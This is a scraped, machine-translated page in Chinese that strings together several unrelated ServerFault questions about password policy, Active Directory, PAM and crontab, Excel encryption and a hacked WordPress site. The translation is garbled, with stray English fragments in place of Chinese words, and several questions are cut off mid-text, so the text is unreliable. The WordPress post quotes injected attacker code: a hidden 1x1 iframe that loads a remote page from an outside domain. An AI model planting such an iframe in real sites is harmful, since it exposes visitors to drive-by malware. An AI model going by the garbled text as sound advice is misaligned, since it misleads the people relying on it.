这是我们的问题,想要通过OWA更改密码的用户会收到此错误“您input的密码不符合最低安全要求”。 即使用户正在尊重最低安全要求。 有了这些设置,我们有错误: Enforced password history 1 passwords remembered Maximum password age 185 days Minimum password age 1 day Minimum password length 7 characters Password must meet complexity requirements enabled 有了这些testing设置,我们没有错误: Enforced password history not defined Maximum password age not defined Minimum password age not defined Minimum password length not defined Password must meet complexity […]
我不知道这是一个stackoverflow问题或serverfault,但在这里: 我有一个Ubuntu 10.04文件服务器(Samba / FTP / HTTP),我希望能够让用户使用他们的networking浏览器将密码更改为服务器。 在使用PHP和一堆exec之前,我写了一个类似的脚本,但是我认为这不是安全的,因为可以通过查看服务器上的进程列表的人来监听它。 是否有某种插件(PHP或Python或其他)可以轻松做到这一点? 我宁愿不使用类似webmin / usermin的东西,因为这是过度的。
我们的一位用户目前在海外,她的Active Directory域密码已过期。 她使用caching凭证和(非AD集成)VPN使用笔记本电脑login,但无法使用过期密码login到文件共享或Outlook。 如果我更改密码,我担心它会为笔记本电脑创buildcaching的login问题,而在她离开八个时区时我无法修复。 表示必须更改密码的标志已经设置。 如果我设置她的密码永不过期,是否会阻止她不得不更改密码,或者无论我做什么,她都必须改变密码? 这里有一个类似的问题表明,将帐户设置为永不过期将会起作用,但是我希望得到一些确认。 编辑:密码永不过期设置只会在她回到办公室之前。 我只是想在她离开的时候让她回到系统,而不会让问题变得更糟。 最终编辑:设置“永不过期”标志解决了问题。 用户将保留她现有的密码,直到她下周返回。
在我以前的工作中,我们使用开放源代码(IMO)安全方法来pipe理networking基础设施,以及其他重要主机的密码(使用Keepass)。 然而,在我的新工作中,似乎他们正在使用受密码保护的Excel电子表格。 在我对密码安全性进行了细致的研究之前,我浏览了一下这个网站,发现微软在他们的办公产品上实现了encryptionfunction。 主要问题: MS Excel / office 2010的密码encryptionfunction有多安全? 我一直认为这是一个处理密码的不安全的方式,是不是这样的情况呢? 使用Excel 2010文档进行密码pipe理有许多缺点吗?
当用户不在时,我们经常需要调整,testing或修复一些软件。 例如,今天我们中的一个人在用户的电脑上build立了一个新的邮件帐户,但用户正在度假。 这就要求我们冒充用户。 当用户不在这里时,在电脑上工作对我们和他们来说都是非常好的。 但是这通常要求我们向他们提供他们的Windows帐户密码,或者在我们使用之前对其进行更改,然后用户在他回来时必须将其更改,但这需要他了解发生了什么事情。 有一个(快速)保存方法,然后恢复Active Directory密码? 1 – 我们保存密码 2 – 我们将密码更改为TECHPASS123 3 – 我们在电脑上工作,我们testing用户的帐户是否一切正常 4 – 我们恢复原来的密码
我有一个箱子从CentOS 5升级到CentOS 6.在原始服务器上,所有用户都有MD5密码。 升级后的服务器现在使用SHA-512密码。 自升级以来已更改其密码并在/etc/shadow具有SHA-512密码的用户能够成功使用crontab ,但未更改其密码且仍旧具有旧MD5密码的用户无法使用crontab 。 他们收到的错误消息是: Authentication service cannot retrieve authentication info You (_username_) are not allowed to access to (crontab) because of pam configuration. 我已经看过/etc/pam.d/system-auth ( 你也可以 ),但我不确定如何调整以允许尚未更改密码的用户访问crontab。 我很清楚,我可以强制每个人用chage -d 0来更改他们的密码,并且更改密码的用户将重新获得对crontab的访问权限(以及其他可能被破坏的内容),但是我有一些用户需要编辑他们的下一次login之前的crontab,以及使用crontab -e -u _username_作为根也失败,具有完全相同的错误,如上所示。 奇怪的是,这个问题没有出现在我的开箱。 在部署之前,我已经在临时框中遇到了这个问题。 用旧的MD5密码的开发盒上的用户可以访问crontab就好了,而/etc/pam.d/system-auth是相同的。 除了IP地址之外,dev和staging框应该是相同的。 我怀疑我错过了一些非常明显和愚蠢的事情 所以我的问题是,如何为尚未更改密码并被SHA-512散列的用户启用对crontab的访问? 或者,我该如何解决这个问题?
最终更新: 在过去的几个星期里,事情已经和平了,并且教会了我更多关于网站安全和风险的信息。 这是我的故事版本 – 我正在使用一个老版本的WordPress,可能这个人从谷歌抓到我。 我认为这是一个脚本攻击。 很难说什么时候,什么时候安全实际上是妥协的,这是我在2009年11月5日发现的。当时我采取了一些安全措施(如下所述),但总是有可能错过了在改变wordpress密码的时候我格式化了我的工作电脑。 现在我已经从主机中删除了所有不需要的PHP脚本,只让我的IP访问pipe理部分,阻止了一个属于越南的特定IP范围。 每日备份和其他的东西。 事情就是有太多的variables涉及到,而且很难跟踪每一件事情。 主要的教训是为它做好准备。 🙂 我正在通过GoDaddy共享托pipe计划并运行一个WordPress网站。 我的网站是在2009年11月5日第一次被黑客攻击的。当时黑客用自己的广告replace了我的广告。 我以为这是因为我对安全的懒惰而发生的,但是我错了。 我格式化了我的电脑,并再次设置一切。 用Microsoft Security Essentials取代了ESET NOD32。 升级到最新版本的WordPress。 更改了所有密码。 build立一个新的数据库。 和其他安全相关的东西我读到这里和那里。 事情有一段时间运行良好,直到我的网站今天再次被黑客攻击。 上次,这个人玩了很多文件,特别是改变了footer.php和所有与广告有关的文件。 但是这次他只是去了正确的地方,换成下面的代码 – <IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME> <form action="http://www.google.com/cse" id="cse-search-box"> <div> <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" […]
鉴于为不同的系统设置不同的密码是多么重要,一个拥有数千台服务器的数据中心如何pipe理? 目前我只能pipe理几十台机器,但数量往往会增长,特别是虚拟机。 如果您克隆一个虚拟机,它将拥有相同的密码,如果这是自动化工作stream的一部分,则没有太多机会改变它。 如果您自动更改密码,需要安全地完成,并且您又回到了单点故障。 那么,人们做什么呢? 我应该解释一下,问题是没有考虑密码(有很多密码生成器),但是有一个高效的设置和logging过程,尤其是当机器是自动创build的。
我有一个计划任务,需要作为服务帐户运行。 服务帐户的密码每100天重置一次,所以我需要更新计划任务的密码。 我无法弄清楚如何做到这一点。 当我在计划任务的属性中select“更改用户或组”时,我不会提示更新密码。 此计划任务将部署在Windows Server 2008 R2和Windows 7上。
当我尝试在Windows 2012服务器上创build超过16个字符的密码时,由于密码太长而被拒绝。 我试图寻找一个名为“最大密码长度”的GPO – 我找不到。 问题可能在于:PwdFilt或PCNSFLT。 regedit的屏幕截图,我也看了。 1 问题是我们需要在我们正在安装的SQL 2014服务器上使用36个字符密码来进行encryption。 有什么build议么?